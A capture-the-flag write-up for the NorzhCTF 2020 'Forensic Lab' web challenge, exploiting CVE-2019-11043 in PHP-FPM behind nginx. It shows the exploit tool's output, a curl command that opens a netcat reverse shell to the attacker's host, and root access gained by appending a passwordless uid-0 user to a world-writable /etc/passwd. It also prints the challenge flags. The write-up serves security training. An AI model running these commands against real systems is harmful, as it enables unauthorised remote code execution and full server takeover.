---
title: NorzhCTF 2020 - [WEB] Forensic Lab (??? points)
author: Stan
tags: CTF, NorzhCTF, 2020, WEB, php, fpm, nginx, rce, linux, permission, file, upload
---

# Forensic Lab

## SUMMARY

Norzh Nuclea's forensic team has developed an application that allows collaborators to submit files to the forensic lab.

Check the reliability of this application and find a way to get root of the server.

Flag format: `ENSIBS{ENTER_FLAG_HERE}`.

## TL;DR

An employee of the company has designed an application to share files. 
He claims to have created a secure platform (a .safe extension is added to all files). 
However, he used a vulnerable version of PHP-FPM which allowed any attacker to execute code remotely without authentication.

## WRITEUP

### Web application

#### Enumeration

The enumeration of the website allows us to identify three links, including two links with the php extension.

```sh
> dirb http://10.13.42.66 -X .html,.php

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

URL_BASE: http://10.13.42.66/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.html,.php) | (.html)(.php) [NUM = 2]

---- Scanning URL: http://10.13.42.66/ ----
+ http://10.13.42.66/about.php (CODE:200|SIZE:16322)
+ http://10.13.42.66/index.html (CODE:200|SIZE:1765)
+ http://10.13.42.66/upload.php (CODE:200|SIZE:1571)                                                                                                                   
```

The first link points to a website where users are invited to upload files.

![File Upload Functionnality](assets/file_upload.png)

The upload files can be found in the uploads directory located at `/uploads`, which is publicly accessible.

![Directory Traversal in uploads folder](assets/uploads_folder.png)

We notice a file with the pcap extension `anubis.pcap.safe`, its analysis leads the researcher to a new challenge.

From now on, we know that it is not possible to bypass the file upload.

The last link is the most important as it provides essential information about the environment where the application is deployed.

![PHP informations](assets/about.png)

This combination between php-fpm (7.1.33dev) and nginx makes the system vulnerable to remote code execution.


An exploit for CVE-2019-11043 is available at : https://github.com/neex/phuip-fpizdam.

```sh
> ./phuip-fpizdam http://10.13.42.66/upload.php
2020/01/05 09:37:03 Base status code is 200
2020/01/05 09:37:03 Status code 502 for qsl=1750, adding as a candidate
2020/01/05 09:37:03 The target is probably vulnerable. Possible QSLs: [1740 1745 1750]
2020/01/05 09:37:03 Attack params found: --qsl 1740 --pisos 31 --skip-detect
2020/01/05 09:37:03 Trying to set "session.auto_start=0"...
2020/01/05 09:37:03 Detect() returned attack params: --qsl 1740 --pisos 31 --skip-detect <-- REMEMBER THIS
2020/01/05 09:37:03 Performing attack using php.ini settings...
2020/01/05 09:37:04 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
2020/01/05 09:37:04 Trying to cleanup /tmp/a...
2020/01/05 09:37:04 Done!
```

We can now execute commands. Do not hesitate to run the command several times.


```html
> curl http://10.13.42.66/upload.php?a=whoami

www-data
<!DOCTYPE html>
<html lang="en" class="no-js">
</html>
```

The current user is as expected : `www-data`.

#### Initial Shell

Launch a reverse shell listener on the attacker station.

```sh
> nc -nlvp 1337
```

We get a shell after launching a netcat reverse shell.

```sh
> curl -G 'http://10.13.42.66/upload.php' --data-urlencode 'a=whoami && nc 192.168.56.103 1337 -e /bin/bash'
```

It is more appropriate to work with an interactive shell.

```sh
python -c 'import pty; pty.spawn("/bin/bash")' 
```

First step validated, we retrieve the user flag.

```sh
www-data@lab-fpm:/usr/share/nginx/html$ cat /user_flag.txt   
cat /user_flag.txt
ENSIBS{R0ck_7h4t_C0d3_3x3c}
```


#### Privilege Escalation


We do Privilege escalation via /etc/passwd weak permissions.


```sh
ls -al /etc/passwd
-rwxrwxrwx 1 root root 1008 Nov 26 10:36 /etc/passwd
www-data@lab-fpm:/usr/share/nginx/html$ echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
su - dummy
root@lab-fpm:~# cat /root/flag.txt
cat /root/flag.txt
ENSIBS{D0n7_m35s_w_P0s1X_r1Gh7S!}
```


The final flag is: `ENSIBS{D0n7_m35s_w_P0s1X_r1Gh7S!}`

*Happy Hacking!*

